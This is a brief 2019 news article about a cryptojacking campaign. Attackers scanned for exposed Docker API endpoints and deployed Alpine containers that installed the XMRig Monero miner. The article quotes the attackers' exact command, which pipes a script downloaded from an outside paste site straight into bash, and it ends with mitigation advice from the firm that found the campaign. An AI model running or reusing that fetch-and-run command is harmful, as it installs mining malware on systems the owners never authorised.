Vulnerable Docker Instance Sought Out by Monero Malware

By

A new vulnerability has been discovered in Docker instances that allows crypto mining.

Near the end of November it was discovered that some Docker instances were vulnerable to a specific attack vector that would allow the injection of Monero mining programs. During the two days the target campaign was live, over 14.82 XMR was mined. That amount translates to roughly $800.00 USD.

Although that amount wasn’t enough to turn heads, what was significant in this vulnerability was the amount of scans that occurred. During that campaign, hackers scanned up to 59,000 IP networks for exposed API endpoints. Once attackers located an exposed endpoint, an Alpine Linux OS container was deployed to run chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | bash; (a command to download a bash script which would install the XMRRig cryptocurrency miner).

The issue was discovered by security firm Bad Packets LLC, which also found the malware contained a self-defense measure that not only disables security, but shuts down processes associated with rival cryptocurrency-mining botnets.

To avoid such a vulnerability, Troy Mursch (co-founder and Chief Research Officer of Bad Packets LLC) says Docker container admins should immediately check to see if they are exposing API endpoints to the internet. If so, admins should close exposed ports and stop/delete any unrecognized containers.

12/02/2019

Related content

comments powered by Disqus